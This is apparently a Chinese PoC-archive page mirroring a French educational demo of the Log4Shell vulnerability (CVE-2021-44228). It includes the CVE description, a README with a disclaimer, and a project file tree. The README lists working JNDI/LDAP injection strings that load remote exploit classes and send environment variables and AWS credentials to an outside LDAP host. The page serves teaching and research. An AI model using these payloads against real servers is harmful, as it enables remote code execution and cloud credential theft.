POC详情: 9da9788670ded4e59b6c89f29338ddebdbce2503

来源
关联漏洞
标题: Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述:Apache Log4j是美国阿帕奇(Apache)基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞,攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器,当该请求被打印成日志时就会触发远程代码执行。
描述
Démo du fonctionnement de log4shell (CVE-2021-44228)
介绍
# Log4Shell

Ce projet est une démonstration du fonctionnement de la faille de sécurité log4shell.

Cette faille est décrite dans la CVE-2021-44228.

Le projet est destiné à un usage pédagogique uniquement.
Il ne doit être utilisé que sur votre propre système et uniquement dans un but expérimental.

**Toute exécution est effectuée à vos risques et périls.**
**L'auteur décline toute responsabilité en cas d'incident en conséquence de l'exécution du projet.**


## Exemple de commandes
    
    ldap_server=i-09cd4f41e5a2b1d66.eu-west-3.compute.internal:1389
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.Exploit}'
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.ExploitP,msg=my friend}'
    hello '${jndi:ldap://'"${ldap_server}"'/run=log4shell.aws.FetchCreds}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:USER}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=PATH:${env:PATH}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=os=${java:os}}'
    hello '${jndi:ldap://'"${ldap_server}"'/log=aws_credentials,AWS_ACCESS_KEY_ID=${env:AWS_ACCESS_KEY_ID},AWS_SECRET_ACCESS_KEY=${env:AWS_SECRET_ACCESS_ID},AWS_SESSION_TOKEN=${env:AWS_SESSION_TOKEN}}'
    
文件快照
 [4.0K]  /data/pocs/9da9788670ded4e59b6c89f29338ddebdbce2503
├── [4.0K]  gradle
│   └── [4.0K]  wrapper
│       ├── [ 58K]  gradle-wrapper.jar
│       └── [ 200]  gradle-wrapper.properties
├── [7.9K]  gradlew
├── [2.7K]  gradlew.bat
├── [4.0K]  hello
│   ├── [ 831]  build.gradle.kts
│   └── [4.0K]  src
│       └── [4.0K]  main
│           ├── [4.0K]  java
│           │   └── [4.0K]  log4shell
│           │       └── [ 484]  Hello.java
│           └── [4.0K]  resources
│               └── [ 316]  log4j2.xml
├── [ 558]  install
├── [ 34K]  LICENSE
├── [4.0K]  log4shell-server
│   ├── [1.0K]  build.gradle.kts
│   └── [4.0K]  src
│       ├── [4.0K]  main
│       │   ├── [4.0K]  java
│       │   │   └── [4.0K]  log4shell
│       │   │       ├── [4.0K]  aws
│       │   │       │   ├── [3.2K]  Creds.java
│       │   │       │   ├── [4.3K]  FetchCreds.java
│       │   │       │   ├── [1.4K]  InstanceSession.java
│       │   │       │   └── [ 370]  LogCreds.java
│       │   │       ├── [ 273]  Command.java
│       │   │       ├── [ 995]  CommandParser.java
│       │   │       ├── [1.4K]  Config.java
│       │   │       ├── [ 204]  Exploit.java
│       │   │       ├── [ 741]  ExploitP.java
│       │   │       ├── [2.5K]  HttpClient.java
│       │   │       ├── [7.7K]  HttpServer.java
│       │   │       ├── [ 948]  IO.java
│       │   │       ├── [ 519]  Json.java
│       │   │       ├── [2.7K]  LdapServer.java
│       │   │       ├── [1.5K]  LogCommand.java
│       │   │       ├── [ 597]  NoOpCommand.java
│       │   │       ├── [2.3K]  RunCommand.java
│       │   │       ├── [1.1K]  ShellServer.java
│       │   │       ├── [ 125]  WithHttpServerUri.java
│       │   │       └── [ 116]  WithParams.java
│       │   └── [4.0K]  resources
│       │       └── [ 931]  logback.xml
│       └── [4.0K]  test
│           └── [4.0K]  java
│               └── [4.0K]  log4shell
│                   └── [ 842]  DnTest.java
├── [1.2K]  README.md
└── [ 401]  settings.gradle.kts

18 directories, 34 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。